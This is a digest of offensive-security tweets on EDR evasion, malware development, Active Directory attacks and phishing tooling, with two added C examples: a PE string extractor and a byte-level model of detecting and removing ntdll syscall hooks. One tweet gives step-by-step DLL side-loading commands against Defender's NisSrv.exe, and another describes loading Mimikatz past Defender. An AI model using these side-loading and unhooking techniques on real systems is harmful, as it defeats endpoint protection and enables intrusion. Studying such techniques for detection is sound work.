[ tifkin_, Lee Christensen ]
User password/doc syncing in corporate environments is dangerous. I've seen many corporate users - particularly IT admins - with Chrome Password sync enabled or LastPass/1Pass installed.
The home computer the DA password is synced to, that their kids use, doesn't have <FancyEDR>
[ tweet ]
[ vinopaljiri, Jiří Vinopal ]
Using #Powershell based on .NET >= 5 or .NET Core (so also the latest Powershell on Linux/Windows) you can easily natively manipulate PE files and do things like in the picture below (ML processing of .data section strings using #StringSifter)
[ tweet ]
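The PE-walking step behind the tweet above, as an added example that is not the author's code or StringSifter's: a portable C parser that walks DOS header, PE signature, COFF header and section table to find the raw file range of `.data`, then pulls printable ASCII runs out of it (the candidate list a ranker like StringSifter would score). Everything here is mine and assumed for illustration: the function names (`pe_find_section`, `extract_strings`, `build_sample_pe`, `sample_data_string_count`), the minimal two-section PE image constructed in memory, and the strings planted in it. The bounds checks are the part a practitioner should copy: a parser fed attacker-controlled binaries must treat every header field as hostile.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* PE on-disk fields are little-endian regardless of host; read/write them explicitly. */
static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t rd32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}
static void wr16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); }
static void wr32(uint8_t *p, uint32_t v) { for (int i = 0; i < 4; i++) p[i] = (uint8_t)(v >> (8 * i)); }

/* Locate the section called `name` and return its raw file range in *off/*size.
   Every offset derived from a header field is checked against `len`, so a truncated
   or deliberately malformed file cannot steer reads outside the buffer. */
int pe_find_section(const uint8_t *img, size_t len, const char *name, size_t *off, size_t *size) {
    if (len < 0x40 || img[0] != 'M' || img[1] != 'Z') return 0;
    size_t e_lfanew = rd32(img + 0x3C);
    if (e_lfanew + 24 > len || memcmp(img + e_lfanew, "PE\0\0", 4) != 0) return 0;
    const uint8_t *coff = img + e_lfanew + 4;
    uint16_t nsec = rd16(coff + 2);          /* NumberOfSections */
    uint16_t opt  = rd16(coff + 16);         /* SizeOfOptionalHeader */
    size_t sh = e_lfanew + 4 + 20 + opt;     /* first IMAGE_SECTION_HEADER (40 bytes each) */
    for (uint16_t i = 0; i < nsec; i++, sh += 40) {
        if (sh + 40 > len) return 0;
        char n[9] = {0};
        memcpy(n, img + sh, 8);              /* Name is 8 bytes, not necessarily NUL-terminated */
        if (strncmp(n, name, 8) != 0) continue;
        size_t raw_size = rd32(img + sh + 16);   /* SizeOfRawData */
        size_t raw_ptr  = rd32(img + sh + 20);   /* PointerToRawData */
        if (raw_ptr + raw_size > len) return 0;  /* header claims bytes the file does not have */
        *off = raw_ptr; *size = raw_size;
        return 1;
    }
    return 0;
}

/* Copy printable-ASCII runs of at least min_len bytes into `out`, one per line.
   Returns the number of runs found (even those that did not fit in `out`). */
size_t extract_strings(const uint8_t *buf, size_t len, size_t min_len, char *out, size_t out_cap) {
    size_t count = 0, used = 0, run = 0;
    if (out_cap) out[0] = 0;
    for (size_t i = 0; i <= len; i++) {
        int printable = i < len && buf[i] >= 0x20 && buf[i] < 0x7F;
        if (printable) { run++; continue; }
        if (run >= min_len) {
            if (used + run + 1 < out_cap) {
                memcpy(out + used, buf + i - run, run);
                used += run; out[used++] = '\n'; out[used] = 0;
            }
            count++;
        }
        run = 0;
    }
    return count;
}

/* Constructed sample (not a real binary): PE32+ headers, a .text section filled with int3
   plus one string, and a .data section holding two strings and one too-short run. */
static uint8_t g_img[0x600];

static void put_section(uint8_t *sh, const char *name, uint32_t va, uint32_t raw_ptr, uint32_t raw_size) {
    memset(sh, 0, 40);
    memcpy(sh, name, strlen(name));
    wr32(sh + 8, raw_size); wr32(sh + 12, va); wr32(sh + 16, raw_size); wr32(sh + 20, raw_ptr);
}

const uint8_t *build_sample_pe(size_t *len) {
    memset(g_img, 0, sizeof g_img);
    g_img[0] = 'M'; g_img[1] = 'Z';
    wr32(g_img + 0x3C, 0x80);                 /* e_lfanew */
    memcpy(g_img + 0x80, "PE\0\0", 4);
    uint8_t *coff = g_img + 0x84;
    wr16(coff + 0, 0x8664);                   /* Machine: AMD64 */
    wr16(coff + 2, 2);                        /* two sections */
    wr16(coff + 16, 0xF0);                    /* PE32+ optional header size */
    wr16(coff + 18, 0x0022);                  /* EXECUTABLE_IMAGE | LARGE_ADDRESS_AWARE */
    wr16(g_img + 0x98, 0x20B);                /* optional header Magic: PE32+ */
    uint8_t *sh = g_img + 0x84 + 20 + 0xF0;   /* section table at 0x188 */
    put_section(sh,      ".text", 0x1000, 0x200, 0x100);
    put_section(sh + 40, ".data", 0x2000, 0x300, 0x100);
    memset(g_img + 0x200, 0xCC, 0x100);
    memcpy(g_img + 0x200, "TEXT_SECTION_STRING", 19);      /* must not show up in .data results */
    const char s1[] = "http://c2.example.invalid/gate.php";  /* constructed, not a real host */
    const char s2[] = "SeDebugPrivilege";
    memcpy(g_img + 0x300, s1, sizeof s1);
    memcpy(g_img + 0x340, "ab", 2);                          /* below the 4-byte threshold */
    memcpy(g_img + 0x380, s2, sizeof s2);
    *len = 0x400;
    return g_img;
}

/* End to end on the sample: strings (>= 4 chars) from .data only; -1 if the PE does not parse. */
long sample_data_string_count(char *out, size_t out_cap) {
    size_t len, off, size;
    const uint8_t *img = build_sample_pe(&len);
    if (!pe_find_section(img, len, ".data", &off, &size)) return -1;
    return (long)extract_strings(img + off, size, 4, out, out_cap);
}

int main(void) {
    char out[512];
    long n = sample_data_string_count(out, sizeof out);
    printf("%ld printable strings (>= 4 chars) in .data:\n%s", n, out);
    return n < 0;
}
```

In PowerShell on .NET 5+ the same lookup is `[System.Reflection.PortableExecutable.PEReader]` with `GetSectionData('.data').GetContent()`; the C version is here because it runs anywhere and makes the bounds checks explicit, which the one-liner hides.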
[ an0n_r0, an0n ]
Had to fix a couple of bugs in the sideload cmd in Sliver, but now it loads the Mimikatz DLL (using Donut behind the scenes) and even bypasses Defender without much effort. It is still not perfect, output fetching is not working for some reason, but it is almost functional.
[ tweet ]
[ NinjaParanoid, Chetan Nayak (Brute Ratel C4) ]
Amongst all EDRs, SentinelOne applies the most userland hooks, not only in DLLs but also in a few other places. So, I decided to make a brief video explaining its hooks & traps in memory, & how #BruteRatel evades it. Video contains light reversing and dev!!
https://t.co/WdS0z4PSyD
https://www.youtube.com/watch?v=qakZwswi5Jw
[ tweet ]
[ ORCA10K, ORCA ]
Released a PoC of Perun's Fart by #sektor7, which patches ntdll with a new one read from a suspended process, thus unhooking your syscalls
https://t.co/y3LKQrwOJL
https://gitlab.com/ORCA000/perunsfart
[ tweet ]
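The detect-and-restore logic that both the SentinelOne-hooks tweet and the Perun's Fart tweet above revolve around, as an added example that is neither ORCA's PoC nor sektor7's code: given a clean copy of the ntdll syscall stubs and the live (possibly hooked) copy, diff them stub by stub, report the hooked ones with the SSN taken from the clean copy, and overwrite the hooked bytes with the clean ones. It runs on a constructed byte model with no Windows APIs: `g_clean` stands in for the stubs read from a freshly spawned suspended process (where Perun's Fart gets its clean image, before the EDR's DLL is injected and hooks it) and `g_live` for the loaded ntdll after an EDR has dropped two inline hooks. The stub layout is the usual Windows 10 x64 shape; the SSN values, hook targets, and every function name (`scan_hooks`, `unhook`, `build_model`, `run_demo`) are my assumptions, and the real-process details (finding ntdll's `.text` via its headers, `ReadProcessMemory` from the suspended child, `VirtualProtect` around the write) are deliberately left out.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define STUB_SIZE 32   /* ntdll lays its Nt and Zw stubs out on 32-byte boundaries */
#define NSTUBS    4

static uint32_t rd32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Unmodified x64 Nt stub (Windows 10 shape):
   4C 8B D1                  mov  r10, rcx
   B8 <ssn>                  mov  eax, SSN
   F6 04 25 08 03 FE 7F 01   test byte ptr [7FFE0308h], 1   (KUSER_SHARED_DATA.SystemCall)
   75 03                     jnz  +3
   0F 05                     syscall
   C3                        ret
   CD 2E                     int  2Eh
   C3                        ret           (remaining bytes are int3 padding) */
static void make_clean_stub(uint8_t *dst, uint32_t ssn) {
    static const uint8_t tail[] = { 0xF6,0x04,0x25,0x08,0x03,0xFE,0x7F,0x01,
                                    0x75,0x03, 0x0F,0x05, 0xC3, 0xCD,0x2E, 0xC3 };
    memset(dst, 0xCC, STUB_SIZE);
    dst[0] = 0x4C; dst[1] = 0x8B; dst[2] = 0xD1;
    dst[3] = 0xB8;
    for (int i = 0; i < 4; i++) dst[4 + i] = (uint8_t)(ssn >> (8 * i));
    memcpy(dst + 8, tail, sizeof tail);
}

/* Two hook shapes an EDR typically places at the stub entry. Both overwrite part of
   "mov eax, SSN", which is why the SSN has to be read from a clean copy. */
static void hook_jmp_rel32(uint8_t *stub, uint32_t rel) {          /* E9 rel32 */
    stub[0] = 0xE9;
    for (int i = 0; i < 4; i++) stub[1 + i] = (uint8_t)(rel >> (8 * i));
}
static void hook_jmp_rip_indirect(uint8_t *stub, uint64_t target) { /* FF 25 00000000 + qword */
    static const uint8_t op[] = { 0xFF,0x25,0x00,0x00,0x00,0x00 };
    memcpy(stub, op, sizeof op);
    for (int i = 0; i < 8; i++) stub[6 + i] = (uint8_t)(target >> (8 * i));
}

typedef struct { int index; uint32_t ssn; uint8_t first_byte; } hook_report;

/* Diff each live stub against the clean one. Any differing byte counts, because hooks are
   not always at the first instruction. Returns the number of hooked stubs. */
int scan_hooks(const uint8_t *live, const uint8_t *clean, int nstubs, hook_report *out, int out_cap) {
    int found = 0;
    for (int i = 0; i < nstubs; i++) {
        const uint8_t *l = live  + (size_t)i * STUB_SIZE;
        const uint8_t *c = clean + (size_t)i * STUB_SIZE;
        if (memcmp(l, c, STUB_SIZE) == 0) continue;
        if (found < out_cap) {
            out[found].index = i;
            out[found].ssn = rd32(c + 4);      /* from the clean copy, never from the hooked bytes */
            out[found].first_byte = l[0];
        }
        found++;
    }
    return found;
}

/* Copy clean stubs over hooked ones. In a live process the page is RX, so this memcpy sits
   between VirtualProtect(RW) and VirtualProtect(RX); that is not modelled here. */
int unhook(uint8_t *live, const uint8_t *clean, int nstubs) {
    int restored = 0;
    for (int i = 0; i < nstubs; i++) {
        uint8_t *l = live + (size_t)i * STUB_SIZE;
        const uint8_t *c = clean + (size_t)i * STUB_SIZE;
        if (memcmp(l, c, STUB_SIZE) != 0) { memcpy(l, c, STUB_SIZE); restored++; }
    }
    return restored;
}

/* Constructed model: four stubs with arbitrary SSNs (not tied to any real Nt function),
   stubs 1 and 3 hooked in the live copy. */
uint8_t g_clean[NSTUBS * STUB_SIZE];
uint8_t g_live [NSTUBS * STUB_SIZE];

void build_model(void) {
    static const uint32_t ssns[NSTUBS] = { 0x18, 0x3A, 0x50, 0xC0 };
    for (int i = 0; i < NSTUBS; i++) make_clean_stub(g_clean + i * STUB_SIZE, ssns[i]);
    memcpy(g_live, g_clean, sizeof g_live);
    hook_jmp_rel32(g_live + 1 * STUB_SIZE, 0x00123456);
    hook_jmp_rip_indirect(g_live + 3 * STUB_SIZE, 0x00007FF812345678ULL);
}

int run_demo(hook_report *rep, int cap) { build_model(); return scan_hooks(g_live, g_clean, NSTUBS, rep, cap); }

int main(void) {
    hook_report rep[NSTUBS];
    int n = run_demo(rep, NSTUBS);
    for (int i = 0; i < n; i++)
        printf("stub %d hooked (first byte %02X), clean SSN = 0x%X\n", rep[i].index, rep[i].first_byte, (unsigned)rep[i].ssn);
    printf("restored %d stub(s)\n", unhook(g_live, g_clean, NSTUBS));
    return 0;
}
```

The same diff, run from the defender's side against an on-disk or known-good copy, is how a memory scanner notices that something has already unhooked ntdll: a `.text` that matches disk byte for byte inside a process where the EDR expects its own hooks is itself a signal.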
[ BlWasp_, BlackWasp ]
PAPAPA NEW PR!
My first PR on CrackMapExec: I have implemented the read and backup functions of the https://t.co/HQleAKcVrm Impacket script in an LDAP module for #CME with some improvements.
For the moment, the write functions are not possible.
https://t.co/NCdsjlsStA
https://github.com/Porchetta-Industries/CrackMapExec/pull/610
[ tweet ]
[ HuskyHacksMK, Matt | HuskyHacks ]
A new section has been added to PMAT and it's available for everyone!
I've added a new sample to teach simple x86 binary patching methodology.
Lesson: https://t.co/cIuqUKd4Fw
Lab Repo: https://t.co/apbskSMBkY
https://notes.huskyhacks.dev/notes/on-patching-binaries
https://github.com/HuskyHacks/PMAT-labs/tree/main/labs/2-4.BinaryPatching/SimplePatchMe
[ tweet ]
[ httpyxel, yxel ]
DeathSleep: A PoC implementation for an evasion technique to terminate the current thread and restore it before resuming execution, while implementing page protection changes during no execution.
https://t.co/rR7FnuVvA8
https://github.com/janoglezcampos/DeathSleep
[ tweet ]
[ DirectoryRanger, DirectoryRanger ]
Good series by @martinsohndk:
https://improsec.com/tech-blog/o83i79jgzk65bbwn1fwib1ela0rl2d
https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-2-known-ad-attacks-from-child-to-parent
https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-3-sid-filtering-explained
https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-4-bypass-sid-filtering-research
https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-5-golden-gmsa-trust-attack-from-child-to-parent
https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-6-schema-change-trust-attack-from-child-to-parent
https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-7-trust-account-attack-from-trusting-to-trusted
[ tweet ]
[ ShitSecure, S3cur3Th1sSh1t ]
Really like the "Malware Dev" posts from @0xPat, a good read for everyone interested in that topic. Especially good for the basics
https://t.co/iRl72r4yz9
https://0xpat.github.io/
[ tweet ]
[ podalirius_, Podalirius ]
[#thread] This weekend I wrote a #tool to scan for @TheApacheTomcat server #vulnerabilities in networks. I've always dreamed of being able to retrieve the list of computers in a #Windows #domain and scan for vulnerable #Apache #Tomcats automatically!
https://t.co/EOWfTbFCRh
https://github.com/p0dalirius/ApacheTomcatScanner/
[ tweet ]
[ mariuszbit, mgeeky | Mariusz Banach ]
Can confirm - a nice DLL side-loading against Defender's executable.
Step 1:
copy "%ProgramFiles%\Windows Defender\NisSrv.exe" C:\Users\Public
Step 2:
g++ --shared -o C:\Users\Public\mpclient.dll proxy.cpp
Step 3:
"C:\Users\Public\NisSrv.exe"
Tasty Initial Access
[ tweet ][ quote ]
[ ORCA10K, ORCA ]
decided to build libraries to help in malware development, so far I've done only little, but here it is:
https://t.co/d0AfK2ypr0
https://github.com/MalwareApiLib/MalwareApiLibrary
[ tweet ]
[ MDSecLabs, MDSec ]
"Fourteen Ways to Read the PID for the Local Security Authority Subsystem Service" - @modexpblog
presents some lesser-known techniques for enumerating LSASS PIDs https://t.co/o7uzJpA0Iq
https://www.mdsec.co.uk/2022/08/fourteen-ways-to-read-the-pid-for-the-local-security-authority-subsystem-service-lsass/
[ tweet ]
[ R0h1rr1m, Furkan Göksel ]
Another technique, Call Stack Spoofing, is in Nim right now! I developed the pure Nim version of the Call Stack Spoofing method thanks to @joehowwolf's PoC and blogpost. You can find the repository below.
https://t.co/R7y34dQaYu
https://github.com/frkngksl/NimicStack
[ tweet ]
[ snovvcrash, snovvcrash ]
[#HackTip] Such a tiny code snippet that can help you bypass some automatic sandbox detections
#maldev
[ tweet ]
[ SemperisTech, Semperis ]
Privilege escalation is a prime tool for attackers to infiltrate your #ActiveDirectory - and from there, anything they want. Learn more about a vulnerability that can enable #cyberattackers to target AD Certificate Services and take over your domain. https://t.co/rwUp9tIiAn
https://www.semperis.com/blog/ad-vulnerability-cve-2022-26923/
[ tweet ]
[ s4ntiago_p, S4ntiagoP ]
A small blogpost (and PoC) about creating Windows processes using syscalls
https://t.co/P5isRGOnN7
https://www.coresecurity.com/core-labs/articles/creating-processes-using-system-calls
[ tweet ]
[ _RastaMouse, Rasta Mouse ]
[BLOG]
Fun post on how to combine evilginx by @mrgretzky and BITB by @mrd0x.
https://t.co/8gShYwEyPY
https://rastamouse.me/evilginx-meet-bitb/
[ tweet ]
[ MDSecLabs, MDSec ]
In part 3 of our "How I Met Your Beacon" series, @domchell analyses techniques to detect Brute Ratel https://t.co/4wNtM5mNH7 #brc4
https://www.mdsec.co.uk/2022/08/part-3-how-i-met-your-beacon-brute-ratel/
[ tweet ]
[ last0x00, last ]
After a few weeks of development, I'm happy to share my new work: PersistenceSniper. It is a #Powershell module that allows #BlueTeams, #IncidentResponders and #Sysadmins to hunt for persistence implanted in their Windows machines. Check it out!
https://t.co/oma0h8gFfF
https://github.com/last-byte/PersistenceSniper/
[ tweet ]